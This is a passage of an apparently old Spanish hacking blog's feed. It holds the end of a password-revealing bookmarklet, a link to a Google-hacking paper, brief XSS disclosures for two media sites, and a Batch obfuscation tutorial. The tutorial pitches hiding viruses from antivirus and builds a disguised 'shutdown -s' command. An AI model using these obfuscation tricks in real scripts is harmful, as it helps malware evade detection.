for(&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;j&lt;/span&gt;&lt;span style="color:#007700;"&gt;=&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;0&lt;/span&gt;&lt;span style="color:#007700;"&gt;; &lt;/span&gt;&lt;span style="color:#0000bb;"&gt;j&lt;/span&gt;&lt;span style="color:#007700;"&gt;&lt;&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;F&lt;/span&gt;&lt;span style="color:#007700;"&gt;.&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;length&lt;/span&gt;&lt;span style="color:#007700;"&gt;; ++&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;j&lt;/span&gt;&lt;span style="color:#007700;"&gt;) { &lt;/span&gt;&lt;span style="color:#0000bb;"&gt;f &lt;/span&gt;&lt;span style="color:#007700;"&gt;= &lt;/span&gt;&lt;span style="color:#0000bb;"&gt;F&lt;/span&gt;&lt;span style="color:#007700;"&gt;[&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;j&lt;/span&gt;&lt;span style="color:#007700;"&gt;]; for (&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;i&lt;/span&gt;&lt;span style="color:#007700;"&gt;=&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;0&lt;/span&gt;&lt;span style="color:#007700;"&gt;; &lt;/span&gt;&lt;span style="color:#0000bb;"&gt;i&lt;/span&gt;&lt;span style="color:#007700;"&gt;&lt;&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;f&lt;/span&gt;&lt;span style="color:#007700;"&gt;.&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;length&lt;/span&gt;&lt;span style="color:#007700;"&gt;; ++&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;i&lt;/span&gt;&lt;span style="color:#007700;"&gt;) { if (&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;f&lt;/span&gt;&lt;span style="color:#007700;"&gt;[&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;i&lt;/span&gt;&lt;span style="color:#007700;"&gt;].&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;type&lt;/span&gt;&lt;span style="color:#007700;"&gt;.&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;toLowerCase&lt;/span&gt;&lt;span style="color:#007700;"&gt;() == &lt;/span&gt;&lt;span style="color:#dd0000;"&gt;"password"&lt;/span&gt;&lt;span style="color:#007700;"&gt;) &lt;/span&gt;&lt;span style="color:#0000bb;"&gt;s &lt;/span&gt;&lt;span style="color:#007700;"&gt;+= &lt;/span&gt;&lt;span style="color:#0000bb;"&gt;f&lt;/span&gt;&lt;span style="color:#007700;"&gt;[&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;i&lt;/span&gt;&lt;span style="color:#007700;"&gt;].&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;value &lt;/span&gt;&lt;span style="color:#007700;"&gt;+ &lt;/span&gt;&lt;span style="color:#dd0000;"&gt;"\n"&lt;/span&gt;&lt;span style="color:#007700;"&gt;; } } if (&lt;/span&gt;&lt;span style="color:#0000bb;"&gt;s&lt;/span&gt;&lt;span style="color:#007700;"&gt;) &lt;/span&gt;&lt;span style="color:#0000bb;"&gt;alert&lt;/span&gt;&lt;span style="color:#007700;"&gt;(&lt;/span&gt;&lt;span style="color:#dd0000;"&gt;"Contraseñas:\n\n" &lt;/span&gt;&lt;span style="color:#007700;"&gt;+ &lt;/span&gt;&lt;span style="color:#0000bb;"&gt;s&lt;/span&gt;&lt;span style="color:#007700;"&gt;); else &lt;/span&gt;&lt;span style="color:#0000bb;"&gt;alert&lt;/span&gt;&lt;span style="color:#007700;"&gt;(&lt;/span&gt;&lt;span style="color:#dd0000;"&gt;"No hay contraseñas en esta página."&lt;/span&gt;&lt;span style="color:#007700;"&gt;);})(); &lt;br /&gt;&lt;/span&gt; &lt;/span&gt; &lt;/code&gt;&lt;!-- php buffer end --&gt;   &lt;/code&gt;  &lt;/div&gt; &lt;/div&gt; &lt;!-- END TEMPLATE: bbcode_php --&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Esto tambien sirve a veces para defacing ;P&lt;/span&gt;&lt;br /&gt; &lt;br /&gt; &lt;br /&gt; &lt;bR&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; bytez! &lt;/span&gt;&lt;br /&gt;&lt;br&gt;&lt;br&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-4289270421769681298?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/4289270421769681298/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/11/firefox-como-saber-que-hay-bajo-los.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/4289270421769681298'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/4289270421769681298'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/11/firefox-como-saber-que-hay-bajo-los.html' title='[Firefox] Como saber que hay bajo los asteriscos'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-4093224048878106898</id><published>2009-11-15T07:57:00.001-08:00</published><updated>2009-11-15T07:59:29.966-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Google'/><title type='text'>Hackeando con Google</title><content type='html'>&lt;span style="font-family:verdana;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-family:verdana;"&gt;&lt;span style="font-weight: bold; color: rgb(255, 255, 0);font-size:180%;" &gt;Hackeando con Google&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Bueno, os dejo un buen artículo para aprender a usar Google como herramienta de ataque:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;embed type="application/pdf" src="http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf" width="600" height="500"&gt;&lt;/embed&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Espero que os guste!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;bye&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-4093224048878106898?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/4093224048878106898/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/11/hackeando-con-google.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/4093224048878106898'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/4093224048878106898'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/11/hackeando-con-google.html' title='Hackeando con Google'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-1566275571168975692</id><published>2009-11-06T15:20:00.000-08:00</published><updated>2009-11-06T15:26:17.770-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='crtvg.es'/><category scheme='http://www.blogger.com/atom/ns#' term='XSS'/><title type='text'>[Bug] XSS en www.crtvg.es</title><content type='html'>&lt;span style="font-family:verdana;"&gt;Bueno, pues aqui va otro descubrimiento de hoy!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Un XSS en &lt;/span&gt;&lt;span style="font-weight: bold;font-family:verdana;" &gt;crtvg.es&lt;/span&gt;&lt;span style="font-family:verdana;"&gt;, una radio y television importante en Galicia.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a style="font-family: verdana;" href="http://www.crtvg.es/TVGacarta/index.asp" class="bbc_link new_win" target="_blank"&gt;http://www.crtvg.es/TVGacarta/index.asp&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;Esta vulnerabilidad permite ejecutar código (posiblemente malicioso) en el buscador.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;El bug ha sido reportado!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-1566275571168975692?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/1566275571168975692/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/11/bug-xss-en-wwwcrtvges.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/1566275571168975692'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/1566275571168975692'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/11/bug-xss-en-wwwcrtvges.html' title='[Bug] XSS en www.crtvg.es'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-5967898528195755231</id><published>2009-11-06T13:35:00.000-08:00</published><updated>2009-11-06T15:26:00.616-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='antena3.com'/><category scheme='http://www.blogger.com/atom/ns#' term='XSS'/><title type='text'>[Bug] XSS en www.antena3.com</title><content type='html'>&lt;span style="font-family:verdana;"&gt;Bueno, hoy mirando webs con HaX991 encontré una vulnerabilidad XSS en el buscador de &lt;span style="font-weight: bold;"&gt;antena3.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a style="font-family: verdana;" href="http://www.antena3.com/PortalA3com/busqueda"&gt;http://www.antena3.com/PortalA3com/busqueda&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;En el buscador inyectan código javascript y este es ejecutado.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;El bug ya ha sido reportado!!&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-5967898528195755231?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/5967898528195755231/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/11/bug-xss-en-wwwantena3com.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/5967898528195755231'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/5967898528195755231'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/11/bug-xss-en-wwwantena3com.html' title='[Bug] XSS en www.antena3.com'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-5718647122872781405</id><published>2009-10-20T10:11:00.000-07:00</published><updated>2009-10-20T10:13:01.927-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ASCII'/><category scheme='http://www.blogger.com/atom/ns#' term='Batch'/><category scheme='http://www.blogger.com/atom/ns#' term='TextToAscii'/><category scheme='http://www.blogger.com/atom/ns#' term='Converter'/><title type='text'>[Tool] TextToASCII</title><content type='html'>&lt;br&gt;&lt;span style="font-family: verdana;"&gt;&lt;br /&gt;Bueno, esta está en &lt;span style="font-weight: bold;"&gt;Batch&lt;/span&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Podeis copiar el code de &lt;/span&gt;&lt;a style="font-family: verdana;" href="http://two.xthost.info/xassiz/Batch/codes/TextToAscii.txt" target="_blank"&gt;&lt;b&gt;aquí&lt;/b&gt;&lt;/a&gt;&lt;span style="font-family: verdana;"&gt;, que es bastante largo..&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul style="margin-top: 0pt; margin-bottom: 0pt; font-family: verdana;"&gt;&lt;li&gt;Pide un string&lt;/li&gt;&lt;li&gt;Lo convierte en ASCII&lt;/li&gt;&lt;li&gt;Da la opcion de copiar el resultado al portapapeles&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://xasscapturas.webcindario.com/Aplicaciones/TextToAscii.jpg" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Dudas, sugerencias, criticas..&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;bytez! &lt;img src="http://www.hackxcrack.es/foro/Smileys/default/wink.gif" alt="Giñar" border="0" /&gt;&lt;/i&gt;&lt;br&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-5718647122872781405?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/5718647122872781405/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/10/tool-texttoascii.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/5718647122872781405'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/5718647122872781405'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/10/tool-texttoascii.html' title='[Tool] TextToASCII'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-9218211405773377366</id><published>2009-10-18T05:35:00.000-07:00</published><updated>2009-10-18T05:39:53.641-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Batch'/><category scheme='http://www.blogger.com/atom/ns#' term='Tutoriales'/><category scheme='http://www.blogger.com/atom/ns#' term='Crackme'/><title type='text'>"Encriptacion y crackmes en Batch" - by xassi</title><content type='html'>&lt;div align="center"&gt;&lt;span style="line-height: 1.3em;font-size:180%;" &gt;&lt;b&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="color:red;"&gt;"Encriptacion y crackmes en Batch desde 0"&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="line-height: 1.3em;font-size:130%;" &gt;&lt;b&gt;&lt;span style="color:limeGreen;"&gt;by xassiz&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color:green;"&gt;&gt;INDICE:&lt;/span&gt;&lt;br /&gt;&lt;span style="color:orange;"&gt;&lt;br /&gt;1.Introduccion&lt;br /&gt;2.Usando Variables&lt;br /&gt;3.Extraccion de Caracteres&lt;br /&gt;4.Reemplazo de Caracteres&lt;br /&gt;5.Parametros&lt;br /&gt;6.Despedida&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;span style="line-height: 1.3em;font-size:130%;" &gt;&lt;b&gt;&lt;span style="color:yellow;"&gt;1. Introduccion&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Bueno, en este tutorial explicare cosas sobre la encriptacion en Batch.&lt;br /&gt;&lt;br /&gt;Codificando nuestros codes, haremos que sea mas dificil la lectura a otras personas por ejemplo para que no nos copien.&lt;br /&gt;&lt;br /&gt;Sirve para muchas cosas por ejemplo para encriptar una contraseña dentro del .bat que no queremos que descubran dandole&lt;br /&gt;a editar, un virus para que el antivirus no lo detecte tan facilmente...&lt;br /&gt;y por supuesto para hacer crackmes.&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;span style="line-height: 1.3em;font-size:130%;" &gt;&lt;b&gt;&lt;span style="color:yellow;"&gt;2. Usando variables&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Para empezar veremos que ya se hace mas dificil leer un bat si escondemos palabras o incluso&lt;br /&gt;comandos en variables:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set cls=echo&lt;br /&gt;set adios=hola&lt;br /&gt;set exit=pause&lt;br /&gt;%cls%.%adios%&lt;br /&gt;%exit%&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;que seria lo mismo que:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;echo.hola&lt;br /&gt;pause&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;En un virus podriamos "setear" (del comando set) estas variables:&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;set a=s&lt;br /&gt;set b=h&lt;br /&gt;set c=u&lt;br /&gt;set d=t&lt;br /&gt;set e=d&lt;br /&gt;set f=o&lt;br /&gt;set g=w&lt;br /&gt;set h=n&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;y escribir:&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;%a%%b%%c%%d%%e%%f%%g%%h% -s&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;para que se apagase el ordenador.&lt;br /&gt;&lt;br /&gt;Para disimular aun mas podemos por ejemplo crear varias variables para el mismo comando o valor, como en el ejemplo anterior.&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set pau=pau&lt;br /&gt;set se=se&lt;br /&gt;%pau%%se%&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;Por ejemplo tenemos un bat con contraseña:&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set/p pass="Password: "&lt;br /&gt;if %pass%==xassiz (echo.Bien) else (echo.Mal)&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;..y en este se veria claramente que la password es "&lt;b&gt;xassiz&lt;/b&gt;".&lt;br /&gt;&lt;br /&gt;Si lo pusieramos asi, seria mas dificil:&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set abc=siz&lt;br /&gt;set cba=xas&lt;br /&gt;set/p pass="Password: "&lt;br /&gt;if "%pass%"=="%cba%%abc%" (echo.Bien) else (echo.Mal)&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;Y si pusieramos asi, aun seria mucho mas dificil:&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set alg=xzsasi&lt;br /&gt;set/p pass="Password: "&lt;br /&gt;if "%pass%"=="%alg:~0,1%%alg:~3,1%%alg:~2,1%%alg:~4,1%%alg:~-1%%alg:~1,1%" (echo.Bien) else (echo.Mal)&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;Este ultimo ejemplo es normal que no lo entendais, es algo mas avanzado que veremos en el siguiente capitulo: &lt;b&gt;La extraccion de caracteres&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;span style="line-height: 1.3em;font-size:130%;" &gt;&lt;b&gt;&lt;span style="color:yellow;"&gt;3. Extraccion de caracteres&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Bueno, esta tecnica, como su nombre indica, es extrayendo caracteres de una variable.&lt;br /&gt;&lt;br /&gt;Su sintaxis es sencilla:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color:red;"&gt;%&lt;/span&gt;&lt;span style="color:limeGreen;"&gt;nombre_variable&lt;/span&gt;&lt;span style="color:red;"&gt;:~&lt;/span&gt;&lt;span style="color:limeGreen;"&gt;caracteres_desechados&lt;/span&gt;&lt;span style="color:red;"&gt;,&lt;/span&gt;&lt;span style="color:limeGreen;"&gt;caracteres_cogidos&lt;/span&gt;&lt;span style="color:red;"&gt;%&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Si no lo entiendes ahora, no te preocupes, con unos ejemplos todo se arregla:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set opc=zzholazz&lt;br /&gt;echo.%opc:~2,4%&lt;br /&gt;::y mostraria "hola"&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;%&lt;/span&gt; = Los dos por cientos indican que es una variable&lt;br /&gt;&lt;span style="color:red;"&gt;:&lt;/span&gt; = Indican que vamos a trabajar con dicha variable&lt;br /&gt;&lt;span style="color:red;"&gt;~&lt;/span&gt; = Indican que la tecnica va ser por extraccion&lt;br /&gt;&lt;span style="color:limeGreen;"&gt;nombre_variable&lt;/span&gt; = opc&lt;br /&gt;&lt;span style="color:limeGreen;"&gt;caracteres_desechados&lt;/span&gt; = 2 (los dos primeros caracteres son zz por lo que no los queremos y los quitamos)&lt;br /&gt;&lt;span style="color:limeGreen;"&gt;caracteres_cogidos&lt;/span&gt; = 4 (los cuatro siguiente caracteres son los que queremos utilizar)&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style="line-height: 1.3em;font-size:78%;" &gt;&lt;span style="text-decoration: underline;"&gt;Los verdes son los campos reemplazables&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bien, pues veremos algunos ejemplos rapidos por encima:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set alg=jajaHackjajBlackjaj&lt;br /&gt;echo.%alg:~4,4%%alg:~11,5%&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;Que mostraria &lt;span style="color:yellow;"&gt;&lt;b&gt;HackBlack&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set alg=jajaHackrBlack&lt;br /&gt;echo.%alg:~4,4%%alg:~9%&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;Que mostraria lo mismo que el anterior. Aqui vemos que la variable &lt;b&gt;alg&lt;/b&gt; no acaba en &lt;b&gt;j&lt;/b&gt;, por lo que lo que queremos coger llegaria hasta el final. En la extraccion ponemos &lt;b&gt;~9&lt;/b&gt;, pero como no hay ninguna coma separando algun otro digito, tomaria todos los caracteres apartir del caracter numero 10.&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set alg=jajaHackBlackj&lt;br /&gt;echo.%alg:~-10,9%&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;En esta extraccion, vemos que la variable &lt;b&gt;alg&lt;/b&gt; tiene el valor &lt;b&gt;jajaHackBlackj&lt;/b&gt;; entonces en este caso utilicé una extraccion con valor negativo: &lt;b&gt;-10&lt;/b&gt;.&lt;br /&gt;Esto empezaria a contar por el final diez carácteres hasta llegar a la &lt;b&gt;H&lt;/b&gt;. A partir de ahi cogeria los 9 siguientes hacia delante porque no queremos que coja la &lt;b&gt;j&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set alg=jajaHackBlack&lt;br /&gt;echo.%alg:~-9%&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;Este es como hace dos ejemplos, pero ahora con valores negativos. Vemos que elimine la &lt;b&gt;j&lt;/b&gt; del valor de la variable!&lt;br /&gt;Entonces, contamos &lt;b&gt;9&lt;/b&gt; hacia atras y llegamos a la &lt;b&gt;H&lt;/b&gt;; como no hay coma separando otro digito coge hasta el final y muestra &lt;b&gt;HackBlack&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set alg=jajaHackBlackj&lt;br /&gt;echo.%alg:~-10,-1%&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;Ahora le volvimos a cambiar el valor de alg a &lt;b&gt;jajaHackBlackj&lt;/b&gt;. En este caso ves que podemos combinar valores negativos en la extraccion &lt;b&gt;-10,-1&lt;/b&gt;, que seguiria mostrando &lt;i&gt;HackBlack&lt;/i&gt; porque coge desde la &lt;b&gt;H&lt;/b&gt; (-12) hasta la &lt;b&gt;k&lt;/b&gt; (-1).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Inventandonos ejemplos veremos cosas utiles que podemos hacer... ahora podemos hacer el programa de la Password usando la &lt;span style="color:red;"&gt;&lt;b&gt;Extraccion de Caracteres&lt;/b&gt;&lt;/span&gt;:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set alg=xzsasi&lt;br /&gt;set/p pass="Password: "&lt;br /&gt;if "%pass%"=="%alg:~0,1%%alg:~3,1%%alg:~2,1%%alg:~4,1%%alg:~-1%%alg:~1,1%" (echo.Bien) else (echo.Mal)&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;Este era el ultimo ejemplo del programa, que supongo que ahora ya entenderas.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;span style="line-height: 1.3em;font-size:130%;" &gt;&lt;b&gt;&lt;span style="color:yellow;"&gt;4. Reemplazo de caracteres&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Bueno, esta es una tecnica usada mas bien para otro tipo de cosas, pero puede utilizarse tambien para encriptacion.&lt;br /&gt;&lt;br /&gt;La sintaxis es parecida a la extraccion pero es mas facil de entender:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color:red;"&gt;%&lt;/span&gt;&lt;span style="color:limeGreen;"&gt;nombre_variable&lt;/span&gt;&lt;span style="color:red;"&gt;:&lt;/span&gt;&lt;span style="color:limeGreen;"&gt;caracter_reemplazador&lt;/span&gt;&lt;span style="color:red;"&gt;=&lt;/span&gt;&lt;span style="color:limeGreen;"&gt;caracter_reemplazado&lt;/span&gt;&lt;span style="color:red;"&gt;%&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;code&gt;@echo off&lt;br /&gt;set alg=H4ckBl4ck&lt;br /&gt;echo.De %alg% a %alg:4=a%&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;Muestra primero la variable alg (&lt;b&gt;H4ckBl4ck&lt;/b&gt;) y luego muestra la misma variable pero los cuatros que aparecian se convirtieron en &lt;b&gt;as&lt;/b&gt; (&lt;b&gt;HackBlack&lt;/b&gt;).&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;%&lt;/span&gt; = Los dos por cientos indican que es una variable&lt;br /&gt;&lt;span style="color:red;"&gt;:&lt;/span&gt; = Indican que vamos a trabajar con dicha variable&lt;br 